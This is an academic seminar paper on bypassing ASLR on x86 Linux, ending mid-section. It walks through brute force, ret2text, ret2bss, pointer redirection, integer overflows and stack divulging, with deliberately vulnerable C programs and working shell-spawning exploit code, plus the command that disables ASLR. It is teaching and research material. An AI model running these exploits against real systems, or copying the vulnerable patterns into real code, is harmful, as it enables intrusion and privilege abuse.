  1. ASLR Smack & Laugh Reference
  2. Seminar on Advanced Exploitation Techniques
  3. Tilo Müller
  4. RWTH Aachen, Germany
  5. Chair of Computer Science 4
  6. February 17, 2008
  7. Address space layout randomization (ASLR) is a
  8. security technology to prevent exploitations of buffer
  9. overflows. But this technology is far from perfect.
  10. ”[...] its only up to the creativity of the attacker what
  11. he does. So it raises the bar for us all :) but just might
  12. make writing exploits an interesting business again.”
  13. ([Dul00] about ASLR). This paper is an introduction
  14. and a reference about this business.
  15. Keywords: ASLR, Address Space Layout Random-
  16. ization, Exploitation
  17. 1 Introduction
Address space layout randomization makes it more difficult to exploit existing vulnerabilities instead of increasing security by removing them. Thus ASLR is no substitute for secure code, but it can offer protection from vulnerabilities that have not been fixed or have not even been published yet. The aim of ASLR is to introduce randomness into the address space of a process. As a result many common exploits fail: with high probability they crash the process instead of executing malicious code.
There are many other prophylactic security technologies besides ASLR, such as StackGuard, StackShield or Libsafe. But only ASLR is implemented and enabled by default in important operating systems. Linux has included ASLR since kernel 2.6.12, which was released in June 2005. Microsoft implemented ASLR in Windows Vista Beta 2, which was released in June 2006. The final Windows Vista release has ASLR enabled by default too, although only for executables that are specifically linked to be ASLR enabled. Other operating systems such as OpenBSD have enabled ASLR as well. So nowadays it is essential for an attacker to deal with ASLR.

Originally ASLR was part of the Page EXec (PaX) project, a comprehensive security patch for the Linux kernel. PaX was already available in 2000, years before kernel 2.6.12. There have also been third party implementations of ASLR for previous versions of Windows. So the idea and even the implementation of address space randomization are not as new as they may appear.
Nevertheless, and in contrast to common exploitation techniques, there is hardly any useful information about advanced techniques to bypass the protection of ASLR. This paper tries to bring together some of the scarce information out there.
First, I briefly show how ASLR works and why many common exploitation techniques fail in its presence. Afterwards I demonstrate mechanisms to bypass the protection of ASLR. The vulnerabilities and their exploits get more difficult in the course of this paper. First I describe two aggressive approaches: brute force and denial of service. Then I explain how to return into non-randomized memory areas, how to bypass ASLR by redirecting pointers and how to get a system to divulge critical stack information. After this I explain some advanced techniques such as the stack juggling methods, GOT hijacking, off-by-ones and overwriting the .dtors section before I come to a conclusion. What I show is that systems with ASLR enabled are still highly vulnerable to memory manipulation attacks. Some of the exploitation techniques described in this paper are also useful to bypass another popular security technology: the nonexecutable stack.
This paper is accompanied by proof of concept code, which is based on a Debian Etch installation without any additional security patches. It is an x86 system with kernel 2.6.23, glibc 2.6.1 and gcc 4.2.3. To keep the samples short, an exemplary shellcode can be found in the appendix and outputs are shortened.

Before you go on, note that basic knowledge of buffer overflows and format string vulnerabilities is recommended. You may want to read [One96] and [Scu01] first.

[cor05], [Whi07], [PaX03], [Kle04]
  84. 2 The functioning of ASLR
How does address space layout randomization work? Common exploitation techniques overwrite return addresses with hard coded pointers to malicious code. With ASLR the predictability of memory addresses is reduced by randomizing the address space layout for each instantiation of a program. So the job of ASLR is to prevent exploits by moving process entry points to random locations, because this decreases the probability that an individual exploit will succeed.
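#include <stdio.h>

/* Returns the current frame pointer (x86, GCC inline assembly). */
unsigned long getEBP(void) {
    unsigned long ebp;
    __asm__("movl %%ebp, %0" : "=r"(ebp));
    return ebp;
}

int main(void) {
    printf("EBP:%lx\n", getEBP());
    return 0;
}
Figure 1: getEBP.c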
Consider the little C program getEBP for instance (see figure 1). We use it to compare the contents of the EBP register with and without ASLR. The EBP register is a pointer into the stack, so it contains a stack address. We are interested in the value of such stack addresses because they are randomized by ASLR. Alternatively one could compare the content of the ESP register or any other pointer to a stack address; not only the content of the EBP register is randomized but all other stack addresses as well.

ASLR can be disabled at boot time by passing the norandmaps parameter, or at runtime via echo 0 > /proc/sys/kernel/randomize_va_space.
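The runtime switch mentioned above can also be read back from a program. The following is a minimal sketch; the helper name read_aslr_mode is hypothetical and not part of the paper's proof of concept code. It only assumes that the file contains a single integer.

```c
#include <stdio.h>

/* Reads the ASLR mode from a procfs-style file.
 * Returns the integer stored there, or -1 if the file cannot be
 * opened or does not start with a number. */
int read_aslr_mode(const char *path) {
    FILE *f = fopen(path, "r");
    int mode = -1;

    if (f == NULL)
        return -1;
    if (fscanf(f, "%d", &mode) != 1)
        mode = -1;
    fclose(f);
    return mode;
}
```

Calling read_aslr_mode("/proc/sys/kernel/randomize_va_space") should yield 0 while ASLR is disabled and a non-zero value while it is enabled.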
  114. Executing getEBP twice while ASLR is disabled
  115. results in:
  116. > ./getEBP
  117. EBP:bffff3b8
  118. > ./getEBP
  119. EBP:bffff3b8
  120. The output probably looks like you have expected it:
  121. The EBP register points to the same address location
  122. on every instantiation of getEBP. But enabling ASLR
  123. results in e.g.:
  124. > ./getEBP
  125. EBP:bfaa2e58
  126. > ./getEBP
  127. EBP:bf9114c8
  128. This is the result of ASLR: The EBP register points to
  129. a randomized address; 24 bits of the 32-bit address are
  130. randomized.
The example illustrates that ASLR prevents attackers from using exploits with hard coded return addresses. Exploits of this kind have been the most common ones for years. With ASLR, manipulating an instruction pointer would most likely crash the vulnerable task with a segmentation fault, because it is impossible to predict a certain address precisely, especially a return address. A ret2libc attack (cf. [c0n06a]) would also crash the process, since libraries are randomized as well (see figure 2). Such a crash allows denial of service attacks on the one hand, but makes failed exploitation attempts easy to detect on the other hand. Therefore it is wise to use a crash detection and reaction system together with ASLR. A simple denial of service is often not what the attacker is after.
> cat /proc/self/maps | egrep '(libc|heap|stack)'
0804d000-0806e000 [heap]
b7de4000-b7f26000 /lib/i686/cmov/libc-2.6.1.so
b7f26000-b7f27000 /lib/i686/cmov/libc-2.6.1.so
b7f27000-b7f29000 /lib/i686/cmov/libc-2.6.1.so
bf873000-bf888000 [stack]
> cat /proc/self/maps | egrep '(libc|heap|stack)'
0804d000-0806e000 [heap]
b7dde000-b7f20000 /lib/i686/cmov/libc-2.6.1.so
b7f20000-b7f21000 /lib/i686/cmov/libc-2.6.1.so
b7f21000-b7f23000 /lib/i686/cmov/libc-2.6.1.so
bf9b3000-bf9c8000 [stack]
Figure 2: /proc/self/maps
Furthermore figure 2 points out that the stack and the libraries are randomized, but not the heap. The text, data and bss areas of the process memory are not randomized either. This behavior does not match the original functionality provided by the PaX project. The original ASLR of the PaX project contained RANDEXEC, RANDMMAP, RANDUSTACK and RANDKSTACK. According to the documentation of the PaX project (cf. [PaX03]) the job of these components is to randomize the following:
RANDEXEC/RANDMMAP - code/data/bss segments
RANDEXEC/RANDMMAP - heap
RANDMMAP - libraries, heap, thread stacks, shared memory
RANDUSTACK - user stack
RANDKSTACK - kernel stack
It seems that not all of these components are fully implemented in the current Linux kernel. This fact takes us to one class of ASLR resistant exploits: return into non-randomized areas. But there are several other ways for an attacker to cope with not knowing the address space layout. We will discuss them in the following sections, beginning with aggressive approaches.

[PaX03], [Sha04], [Kle04]
  186. 3 Aggression
  187. 3.1 Brute force
  188. ASLR increases the consumption of the system’s en-
  189. tropy pool since every task creation requires some bits
  190. of randomness (cf. [PaX03]). Among others the se-
  191. curity is based on how predictable the random address
  192. space layout of a program is.
  193. There are a lot of very detailed expositions about this
  194. topic. [Whi07] for instance, comes to the following
  195. result regarding Windows: The protection offered by
  196. ASLR under Windows Vista may not be as robust as
  197. expected.
The success of pure brute force depends heavily on how tolerant an exploit is to variations in the address space layout, e.g. how many NOPs can be placed in the buffer. Furthermore it depends on how many exploitation attempts an attacker can perform and how fast he can perform them. It is necessary that a task can be restarted after a crash. But this is not as improbable as it sounds, because a lot of network servers restart their services upon crashing. [Sha04] for instance shows how to compromise an Apache web server by brute force over the network.

In section 2 I mentioned that only 24 bits are randomized on a 32-bit architecture. On a 64-bit architecture there are more bits to randomize. Since every additional bit doubles the number of possible stack layouts, most of the working brute force exploits for an x86 architecture will not succeed on an x64 machine. According to [Sha04] the most promising defense against brute force is to upgrade to a 64-bit architecture.
#include <string.h>

void function(char *args) {
    char buff[4096];
    strcpy(buff, args);
}

int main(int argc, char *argv[]) {
    function(argv[1]);
    return 0;
}
Figure 3: bruteforce.c
Consider the C program bruteforce for instance (see figure 3). This code contains a classic strcpy vulnerability (cf. [One96]). There is a buffer of 4096 bytes that we want to use for placing malicious code and some NOPs (it would even be possible to place more code and NOPs above this buffer). Without ASLR it would be easy to determine the approximate return address using gdb, to manipulate the saved return address (RIP) by a buffer overflow and to run the shellcode. But under ASLR it makes no sense to determine any stack address; it is necessary to guess one. With 24 random bits and a 4096 byte buffer there are 2^24 / 4096 = 4096 possible positions, so the chance of hitting a working return address is about one in 4096 and an exploit requires 2048 attempts on the average.
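The arithmetic behind this estimate can be written down as a small sketch. The function names are hypothetical, and the model is a simplification: it assumes that every position of the NOP window is equally likely. Note that the figure of 2048 corresponds to scanning a fixed layout position by position; if the layout is randomized anew on every attempt, the attempts are independent and the mean is the full number of positions.

```c
#include <stdint.h>

/* Number of equally likely positions: 2^bits addresses divided into
 * windows of `window` bytes (assumes bits < 64 and window > 0). */
uint64_t window_count(unsigned bits, uint64_t window) {
    return ((uint64_t)1 << bits) / window;
}

/* Mean number of attempts when one fixed layout is scanned
 * window by window. */
uint64_t mean_attempts_fixed_layout(unsigned bits, uint64_t window) {
    return window_count(bits, window) / 2;
}

/* Mean number of attempts when every attempt faces a fresh random
 * layout: independent trials with success probability 1/window_count. */
uint64_t mean_attempts_rerandomized(unsigned bits, uint64_t window) {
    return window_count(bits, window);
}
```

With 24 random bits and a 4096 byte window this gives 4096 positions. Each additional random bit doubles all three values, which is why more address bits make brute force so much less attractive.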
  240. You can find an exploit for bruteforce in figure
  241. 4 and 5. It takes about five minutes on a 1.5 GHz CPU
  242. to get the exploit working. Finally a shell opens up:
  243. > ./bfexploit.sh
  244. ./bfexploit.sh: line 9: Segfault
  245. [...]
  246. ./bfexploit.sh: line 9: Segfault
  247. sh-3.1$ echo yipieh!
  248. yipieh!
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90

/* shellcode[] is the exemplary shellcode from the appendix. */

int main(int argc, char *argv[]) {
    char *buff, *ptr;
    long *adr_ptr, adr;
    int i;
    int bgr = atoi(argv[1]) + 8;    /* +8 covers saved EBP and return address */
    int offset = atoi(argv[2]);

    buff = malloc(bgr + 1);         /* one extra byte for the terminating NUL */
    adr = 0xbf010101 + offset;      /* guessed stack address */
    for (i = 0; i < bgr; i++)
        buff[i] = NOP;
    ptr = buff + bgr - 8;
    adr_ptr = (long *)ptr;
    for (i = 0; i < 8; i += 4)
        *(adr_ptr++) = adr;
    ptr = buff + bgr - 8 - strlen(shellcode);
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[bgr] = '\0';
    puts(buff);
    return 0;
}
Figure 4: bfexploit.c

#!/bin/sh
i=0
while true; do
    ./bruteforce `./bfexploit 4096 $i`
    i=$(($i + 2048))
    if [ $i -gt 16777216 ]; then
        i=0
    fi
done;
Figure 5: bfexploit.sh

3.2 Denial of service
There are two possibilities. One approach is to induce a denial of service by simply overflowing a buffer. The success of such a denial of service attack is independent of the protection given by ASLR. By now it should be clear how to use buffer overflows for such a simple attack. For a proof of concept you can draw on figure 3: pass a 6000 byte parameter of nonsense and the program will crash with a segmentation fault, because the return address is overwritten with an invalid value.

Furthermore it is possible to use format string vulnerabilities to cause a denial of service. This approach is likewise independent of the protection of ASLR. Format string vulnerabilities occur when a lazy programmer types printf(str) instead of printf("%s",str). More often than not the output is the same, so the mistake keeps a low profile. Since the real format string is missing, the str parameter is interpreted as the format string instead. This opens a security hole if an attacker can influence the content of str. For example, passing the format instruction %x several times makes it possible to read out the stack contents, because printf still assumes that the stack contains the correct number of arguments. printf just reads the stack contents following the format string pointer, even if these contents were never meant to be arguments. Details about format string vulnerabilities can be found in [Scu01].

A process crashes if printf interprets an argument as a string pointer although the value does not point to accessible memory. So passing a format string that contains the format instruction %s can cause a segmentation fault.
  317. Consider the little C program listed in figure 6. It
  318. contains a single vulnerable printf call.
#include <stdio.h>

int main(int argc, char **argv) {
    printf(argv[1]);
}
Figure 6: formatStringDos.c
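For contrast with figure 6, here is a minimal sketch of the correct call. The helper name format_untrusted is hypothetical. It passes the user-controlled text as an argument to a fixed "%s" format, so that conversion specifiers inside the text are copied literally instead of being interpreted.

```c
#include <stdio.h>

/* Formats untrusted text with a fixed format string. Conversion
 * specifiers inside `user` are copied literally. Returns the number
 * of characters that would have been written (as snprintf does). */
int format_untrusted(char *out, size_t out_size, const char *user) {
    return snprintf(out, out_size, "%s", user);
}
```

Passing the string %8$s through this helper simply yields the four characters %8$s; no stack contents are read and no pointer is dereferenced.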
Small numbers like 0, 1 or 2 are examples of invalid pointers. Each attempt to dereference them ends in a segmentation fault. So a denial of service can be caused by letting the format instruction %s try to dereference such an invalid pointer. Using gdb shows where printf expects its parameters and where to find small numbers:
  329. (gdb) run %x_%x_%x_%x_%x_%x_%x_%x
  330. Breakpoint 1
  331. (gdb) x/9x $esp
  332. 0xb7f8eb70 0xbf900190 0xbf9001e8
  333. 0xb7e39050 0xb7f9cce0 0x080483b0
  334. 0xbf9001e8 0xb7e39050 0x00000002
  335. (gdb) continue
  336. bf900190_bf9001e8_b7e39050_b7f9cce0
  337. _80483b0_bf9001e8_b7e39050_2
Thus interpreting the eighth argument as a string pointer ends in a segmentation fault, because this location contains 2, which is not a valid pointer:
  341. ./formatStringDos %8\$s
  342. Segmentation fault
4 Return into non-randomized memory
In section 2 you have seen that the stack is randomized by ASLR. But there are still some areas of the address space that are not randomized: the heap, the bss, the data and the text segment. As a reminder I list the differences between these areas (following [Kle04]):
• Stack: parameters and dynamic local variables
• Heap: dynamically created data structures (malloc)
• BSS: uninitialized global and uninitialized static local variables
• Data: initialized global and initialized static local variables
• Text: readonly program code
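The five areas listed above can be made visible with a short sketch. All names are hypothetical. The helper prints one sample address per area, so that the output of two runs can be compared. It assumes the setup used in this paper; on current distributions compilers often build position independent executables by default, in which case text, data and bss move as well unless the program is built with an option such as gcc's -no-pie.

```c
#include <stdio.h>
#include <stdlib.h>

int bss_var;            /* uninitialized global: bss */
int data_var = 42;      /* initialized global: data  */

/* Prints one sample address per memory area. Returns the number of
 * lines written, or -1 if the heap allocation fails. */
int print_layout(FILE *out) {
    int stack_var = 0;
    void *heap_var = malloc(16);

    if (heap_var == NULL)
        return -1;
    fprintf(out, "stack: %p\n", (void *)&stack_var);
    fprintf(out, "heap:  %p\n", heap_var);
    fprintf(out, "bss:   %p\n", (void *)&bss_var);
    fprintf(out, "data:  %p\n", (void *)&data_var);
    /* Converting a function pointer to void * is a common POSIX
     * extension, not strict ISO C. */
    fprintf(out, "text:  %p\n", (void *)print_layout);
    free(heap_var);
    return 5;
}
```

Calling print_layout(stdout) from main and running the program twice shows which lines change between runs and which stay the same.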
  360. 4.1 ret2text
The text region is marked read-only and any attempt to write to it results in a segmentation violation. Therefore it is not possible to place shellcode in this area. It is possible, however, to manipulate the program flow: overwriting the return address with another reasonable pointer into the text area makes the program jump into its own original code.

This kind of exploitation is interesting for code segments that cannot be reached in normal program flow. Consider the C program ret2text (see figure 7). This program contains a classic strcpy vulnerability and a code segment that only root can execute.
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void public(char *args) {
    char buff[12];
    strcpy(buff, args);
    printf("public\n");
}

void secret(void) {
    printf("secret\n");
}

int main(int argc, char *argv[]) {
    if (getuid() == 0) secret();
    else public(argv[1]);
}
Figure 7: ret2text.c
Jumping into secret requires the address of this function, which can be determined with gdb as follows:
(gdb) print secret
$1 = {void (void)} 0x80483fa <secret>
Overflowing the buffer with this address provides a working exploit:
> ./ret2text \
> `perl -e 'print "A"x16; \
> print "\xfa\x83\x04\x08"'`
  395. public
  396. secret
  397. Segmentation fault
The segmentation fault does not matter in most cases, since the secret code has already been executed.

If a program does not contain secret code that is interesting to execute, an attacker can try to chain chunks of existing code into a useful shellcode. This borrowed code technique is described in [Kra05], using code fragments of libc to bypass a nonexecutable stack. Under ASLR an attacker cannot use code fragments of libc, since libraries are randomized. But it is still conceivable to use code fragments of the vulnerable program itself. The possibilities to create useful shellcode grow with the size of the program.

The code fragments that can be used for this purpose are contiguous assembler chunks up to a return instruction. The return instructions chain the code chunks together. This works as follows: a buffer overflow is used to overwrite the return address with the start address of the first code chunk. This chunk is executed until the program flow reaches its closing return instruction. After that the next return address is read from the stack, which is ideally the start address of the second code chunk. So the start address of the second chunk has to be placed right above the start address of the first chunk. The second chunk is also executed until its closing return instruction is reached. Then the start address of the third chunk is read from the stack, and so on.
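The control flow of such a chain can be illustrated with a harmless simulation. This is only a sketch of the idea, not an exploit: ordinary C functions stand in for the code chunks, an array stands in for the overwritten stack, and all names are hypothetical.

```c
#include <stddef.h>

/* A "chunk" stands in for a code fragment that ends in a return. */
typedef void (*chunk_fn)(int *state);

void chunk_add_one(int *state) { *state += 1; }
void chunk_double(int *state)  { *state *= 2; }

/* Simulates the chain: each slot of `fake_stack` plays the role of a
 * return address. When one chunk finishes, control continues with the
 * chunk whose address sits in the next slot. */
int run_chain(const chunk_fn *fake_stack, size_t slots, int start) {
    int state = start;
    size_t i;

    for (i = 0; i < slots; i++)
        fake_stack[i](&state);
    return state;
}
```

For a fake stack holding chunk_add_one, chunk_double and chunk_add_one, a start value of 1 is turned into 5. The order of the addresses alone determines what the chain computes.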
  425. 4.2 ret2bss
  426. The bss area contains all uninitialized global and unini-
  427. tialized static local variables. It is writable and there-
  428. fore global variables are potential locations for placing
  429. malicious code. Furthermore this area is not random-
  430. ized by ASLR and it is feasible to determine fixed ad-
  431. dresses.
  432. That sounds great, but there is one problem: A clas-
  433. sic stack overflow is still necessary, because the return
  434. addresses are saved on the stack - not in the bss area.
  435. Hence two inputs are needed: One to overflow a buffer
  436. and one to infiltrate the bss area with shellcode.
#include <string.h>

char globalbuf[256];

void function(char *input) {
    char localbuf[256];
    strcpy(localbuf, input);
    strcpy(globalbuf, localbuf);
}

int main(int argc, char **argv) {
    function(argv[1]);
}
Figure 8: ret2bss.c
It is possible to avoid two inputs if there is one input that is stored both on the stack and in the bss area. Consider the C program ret2bss (see figure 8). The input is stored in localbuf, which lets an attacker overflow the buffer, and it is stored in globalbuf, which lets an attacker place his shellcode.

The address of the infiltrated code can be determined by using gdb as follows:
(gdb) print &globalbuf
$2 = (char (*)[256]) 0x80495e0
A possible exploit can be found in figure 9. Passing the output of this exploit as input to ret2bss opens up a shell:
> ./ret2bss `./ret2bssexploit`
sh-3.1$ echo ay caramba!
ay caramba!
sh-3.1$
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* shellcode[] is the exemplary shellcode from the appendix. */

int main(void) {
    char *buff, *ptr;
    long *adr_ptr;
    int i;

    buff = malloc(264 + 1);         /* one extra byte for the terminating NUL */
    ptr = buff;
    for (i = 0; i < 264; i++)
        *(ptr++) = 'A';
    ptr = buff + 264 - 8;
    adr_ptr = (long *)ptr;
    for (i = 0; i < 8; i += 4)
        *(adr_ptr++) = 0x080495e0;  /* address of globalbuf */
    ptr = buff;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];
    buff[264] = '\x00';
    printf("%s", buff);
}
Figure 9: ret2bssexploit.c
  484. 4.3 ret2data
The data area contains all initialized global and initialized static local variables. Thus the only difference from the bss area is that the variables are initialized here. A return into the data area works analogously to a return into the bss area.
  490. 4.4 ret2heap
The heap contains all dynamically created data structures, i.e. all variables that get their memory assigned by malloc. The heap is not randomized by ASLR either, and a return into the heap is possible, again very similar to ret2bss. Just place the shellcode in a dynamically created data structure instead of a global variable.

Note that a return into the heap has absolutely nothing to do with a heap overflow (as known from [Con99]). A ret2heap uses the heap because of its fixed addresses; it does not change the structure of the heap.

The heap overflow technique described in [Con99] does not work anymore. But this is not due to ASLR; it is because the heap implementation has been updated.
  507. 5 Pointer redirecting
  508. This section describes how to redirect pointers that
  509. have been declared by the programmer - not how to
  510. redirect internal pointers. These pointers can be string
  511. pointers or even function pointers.
  512. 5.1 String pointers
Hardcoded strings are not pushed onto the stack, but stored within non-randomized areas. Therefore it is relatively easy to redirect a string pointer to another string. The idea of redirecting string pointers is not to manipulate the output, but rather to manipulate the arguments of critical functions like system or execv.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *args[]) {
    char input[256];
    char *conf = "test -f ~/.progrc";
    char *license = "THIS SOFTWARE IS...\n";

    printf(license);
    strcpy(input, args[1]);
    if (system(conf)) printf("Missing .progrc");
}
Figure 10: strptr.c
Consider the vulnerable program strptr in figure 10. This program contains two hardcoded strings: conf and license. The license string is just meant for output; conf is meant to be executed as a shell command. Assume an attacker can make conf point to the license string. What would then be executed in the if statement is:
system("THIS SOFTWARE IS...\n");
system tries to execute THIS and treats the remaining string as parameters for THIS. An executable file called THIS cannot be found on a normal Unix system, but it can be created by an attacker. An attacker can write an arbitrary binary or script called THIS that will be executed with the privileges of strptr. It could contain /bin/sh for instance. Note that this exploitation technique cannot be used remotely, since an executable file has to be created locally, and note that this executable file has to be reachable via the PATH environment variable.

The string pointer conf can be overwritten since the program contains a strcpy vulnerability. One can use gdb to read out the address of the license string:
(gdb) print license
0x8048562 "THIS SOFTWARE IS...\n"
So the conf pointer should be redirected to 0x08048562. An exploit works as follows:
> echo "/bin/sh" > THIS
> chmod 777 THIS
> PATH=.:$PATH
> ./strptr `perl -e 'print "A"x256;\
> print "\x62\x85\x04\x08"'`
THIS SOFTWARE IS...
sh-3.1$
  562. 5.2 Function pointers
Redirecting function pointers is just as useful as redirecting string pointers. Function pointers are widely used, for instance to implement virtual functions in C++. They are used to realize GUIs, or more critically to implement SSL.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void function(char *str) {
    printf("%s\n", str);
    system("any command");
}

int main(int argc, char **argv) {
    void (*ptr)(char *str);
    ptr = &function;
    char buff[64];

    strcpy(buff, argv[1]);
    (*ptr)(argv[2]);
}
Figure 11: funcptr.c
Consider the example funcptr listed in figure 11. The program reads two user inputs. During normal program flow ptr points to function and the last statement of main prints argv[2]. But if an attacker can overflow buff in such a way that ptr points to system, the second user argument will be executed. An attack would use the first argument to exploit the strcpy vulnerability and the second one to hand over the shell command. It simplifies the challenge when system is already called somewhere (here in funcptr).

The address of system can be determined by using the debugger as follows:
(gdb) disass function
<function+24>: call 0x8048328 <system>
Thus ptr has to be overwritten with 0x08048328. What this address means in particular will be explained in section 9 during the explanation of GOT and PLT. Writing the exploit is straightforward, so I go on without listing it.
  600. 6 Integer overflows
ASLR does not prevent buffer overflows, it just makes them more difficult to exploit. The same holds for integer overflows: ASLR does not prevent them. Avoiding overflows is still in the hands of the programmer.

Thus it is still worthwhile to look out for integer overflows. But exploiting them has always been problematic, without ASLR and even more so with ASLR. It can be easy to induce a segmentation fault, but executing shellcode requires more than an integer overflow. A buffer overflow vulnerability has to arise as a consequence, e.g. after the size of the input has been faked. Be content with segmentation faults in this section; how to execute your shellcode is covered by other sections. More details about integer overflows can be found in [ble02].
  616. 6.1 Widthness overflows
A widthness overflow is the result of storing a value into a data type that is too small to hold it. For example, the type char holds exactly one byte: values from -128 to +127 when char is signed, as it is with gcc on x86. Numbers outside this range are truncated to their least significant byte: 256 becomes 0, 257 becomes 1, et cetera.
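The truncation described above can be checked with a one-line helper. This is a minimal sketch with a hypothetical name. It uses unsigned char, for which C defines the conversion as reduction modulo 256 (assuming 8-bit bytes); for a plain signed char the result of an out-of-range conversion is implementation-defined.

```c
#include <stddef.h>

/* Stores a length in a single byte. Only the least significant byte
 * survives, i.e. the value modulo 256 on systems with 8-bit bytes. */
unsigned char truncate_to_byte(size_t value) {
    return (unsigned char)value;
}
```

A length of 256 is stored as 0 and a length of 257 as 1, so a size check performed on the truncated value says nothing about the real length.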
Consider figure 12. The programmer checks the size of the user input before copying it into the buffer. Usually this should avoid overflows. But he decided to use char variables to store the sizes, since buff is small enough to do so. The result of this decision is that a buffer overflow can occur anyhow:
> ./widthness `perl -e 'print "A"x256'`
Copy 0 byte
Segmentation fault
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
    char bsize = 64;
    char buff[bsize];
    char isize = strlen(argv[1]);   /* length is truncated to one byte */

    if (isize < bsize) {
        printf("Copy %i byte\n", isize);
        strcpy(buff, argv[1]);
    }
    else {
        printf("Input out of size.\n");
    }
}
Figure 12: widthness.c
A buffer overflow occurs if the user input is longer than 127 bytes and the least significant byte of its length, read as a signed char, is smaller than 64. This includes every length whose low byte lies between 128 and 255, since such a byte is read as a negative number.

Mind that a widthness overflow can occur not only during an assignment, but also during arithmetic operations. For example, increasing the 32-bit integer 0xffffffff by one results in 0.
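The arithmetic case can be guarded against before the addition is carried out. The following is a minimal sketch with a hypothetical helper name, not code from the paper; it tests whether the sum would exceed the 32-bit range.

```c
#include <stdint.h>

/* Adds two 32-bit unsigned values. Returns 1 and stores the sum if it
 * fits into 32 bits, or returns 0 if the addition would wrap around. */
int checked_add_u32(uint32_t a, uint32_t b, uint32_t *sum) {
    if (a > UINT32_MAX - b)
        return 0;
    *sum = a + b;
    return 1;
}
```

For 0xffffffff plus 1 the helper reports a wrap-around instead of silently producing 0.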
  653. 6.2 Signedness bugs
Signedness bugs occur when an unsigned variable is interpreted as signed or vice versa. The problem is that a lot of predefined system functions like memcpy interpret the length parameter as an unsigned integer (size_t), whereas most programmers use int (which is equivalent to signed int).
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {
    char dest[1024];
    char src[1024];
    int cp = atoi(argv[1]);

    if (cp <= 1024)
        memcpy(dest, src, cp);      /* cp is converted to size_t here */
    else
        printf("Input out of range.\n");
}
Figure 13: signedness.c
Consider figure 13. The user can determine how many bytes from src are copied to dest. Passing a huge number in order to overflow the four byte range of cp does not work. But passing a negative number leads to a buffer overflow, since a negative number is always smaller than 1024 and memcpy interprets it as an unsigned integer (e.g. -1 as 0xffffffff):
> ./signedness -1
Segmentation fault
This type of vulnerability often occurs in network daemons, when length information is sent as part of the packet.
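The missing lower bound is what makes the check in figure 13 insufficient. A minimal sketch of a complete check follows; the helper name is hypothetical. It rejects negative values before the length is converted to the unsigned type that memcpy expects.

```c
#include <stddef.h>

/* Validates a signed, user-supplied length against a buffer capacity.
 * Returns 1 and stores the length as size_t if
 * 0 <= requested <= capacity, otherwise returns 0. */
int checked_length(int requested, size_t capacity, size_t *out) {
    if (requested < 0)
        return 0;                   /* would become huge as size_t */
    if ((size_t)requested > capacity)
        return 0;
    *out = (size_t)requested;
    return 1;
}
```

With this check a request of -1 is refused, whereas the comparison cp <= 1024 alone lets it through.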
  682. 7 Stack divulging methods
This approach to bypassing ASLR tries to discover information about the random addresses. This makes sense for daemons or other persistent processes, since the address space layout is randomized only when a process is started and not during its lifetime.

There may be several ways of getting this critical information. I want to demonstrate two very different ones: the stack stethoscope (according to [Kot05b]) and a simple form of exploiting format string vulnerabilities.
  693. 7.1 Stack stethoscope
The address of the bottom of a process's stack can be detected by reading /proc/<pid>/stat. The 28th item of the stat file is the address of the stack's bottom. From this information the remaining stack addresses can be calculated, due to the fact that offsets within the stack are constant. These offsets can be determined with gdb, for example.
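Picking the 28th item out of a stat line can also be done in C instead of awk. The sketch below is an illustration under assumptions: the function name parse_startstack is made up, and the parser starts counting after the last closing parenthesis because the second field (the command name) is parenthesised and may itself contain spaces.

```c
#include <stdlib.h>
#include <string.h>

/* Extract field 28 from one line of /proc/<pid>/stat.
 * Returns 0 on success, -1 if the line is too short or malformed. */
int parse_startstack(const char *line, unsigned long *out)
{
    const char *p = strrchr(line, ')');   /* end of field 2 (comm) */
    int field = 2;                        /* fields consumed so far */

    if (p == NULL)
        return -1;
    p++;
    while (*p != '\0') {
        while (*p == ' ')
            p++;                          /* skip separators */
        if (*p == '\0')
            break;
        field++;
        if (field == 28) {
            char *end;
            *out = strtoul(p, &end, 10);
            return end == p ? -1 : 0;
        }
        while (*p != ' ' && *p != '\0')
            p++;                          /* skip this field */
    }
    return -1;
}
```

A caller would read the single line of /proc/<pid>/stat with fgets and pass it to parse_startstack; the result corresponds to the value printed by awk '{ print $28 }'.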
Daemons or processes that wait for input interactively are exploitable by this technique, since an attacker has enough time to read /proc/<pid>/stat.
The disadvantage of this approach is that access to the machine is absolutely necessary, i.e. it is a local exploit technique. The advantage of this technique is that ASLR is almost useless against anyone who has this access, because the stat files are readable by everyone by default:
  710. -r--r--r-- 1 root root 0 stat
Consider the network daemon divulge (see figure 14). This daemon reads data from a client and sends it back. The strcpy vulnerability allows a buffer overflow.

#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define SA struct sockaddr
int listenfd, connfd;
void function(char *str) {
    char readbuf[256];
    char writebuf[256];
    strcpy(readbuf, str);          /* overflow: str can hold up to 1023 bytes */
    sprintf(writebuf, readbuf);    /* client data is used as format string */
    write(connfd, writebuf, strlen(writebuf));
}
int main(int argc, char *argv[]) {
    char line[1024];
    struct sockaddr_in servaddr;
    ssize_t n;
    listenfd = socket(AF_INET, SOCK_STREAM, 0);
    bzero(&servaddr, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
    servaddr.sin_port = htons(7776);
    bind(listenfd, (SA *)&servaddr, sizeof(servaddr));
    listen(listenfd, 1024);
    for (;;) {
        connfd = accept(listenfd, (SA *)NULL, NULL);
        write(connfd, "> ", 2);
        n = read(connfd, line, sizeof(line) - 1);
        line[n] = 0;
        function(line);
        close(connfd);
    }
}
Figure 14: divulge.c

To exploit this vulnerability an attacker has to determine the constant offset between the stack's bottom and the beginning of writebuf, where the shellcode will be placed. The offset can be determined by using gdb as follows:
(gdb) list
16 sprintf(writebuf,readbuf);
17 write(connfd,writebuf,strlen(..));
(gdb) break 17
(gdb) run
Breakpoint 1 at divulge.c:17
(gdb) print &writebuf
(char ( * )[256]) 0xbfe14858
After setting the breakpoint and running divulge, a connection to the server has to be established: echo AAAAA | nc localhost 7776.
